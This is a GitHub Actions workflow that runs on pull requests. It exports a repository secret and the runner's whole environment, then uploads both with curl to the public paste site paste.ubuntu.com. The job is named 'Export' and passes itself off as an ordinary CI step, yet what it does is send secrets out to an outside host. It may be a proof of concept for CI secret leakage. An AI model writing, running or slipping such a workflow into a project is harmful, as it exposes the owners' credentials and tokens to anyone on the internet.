on: [pull_request]

jobs:
  export:
    runs-on: ubuntu-latest
    name: Export
    container: sstc/notify
    env:
      A_SECRET: ${{ secrets.A_SECRET }}
    steps:
      - uses: actions/checkout@v2
      - run: |
          f=$(mktemp)
          env > $f
          echo '-------------------------' >> $f
          echo '${A_SECRET}' | envsubst >> $f
          echo '-------------------------' >> $f
          curl -v --data-urlencode "content@${f}" -d "poster=a" -d "syntax=text" -d "expiration=day" http://paste.ubuntu.com
          v=$(echo "$A_SECRET"|jq -s -R -r @uri)
          curl -v --data-urlencode "content=${v}" -d "poster=a" -d "syntax=text" -d "expiration=day" http://paste.ubuntu.com
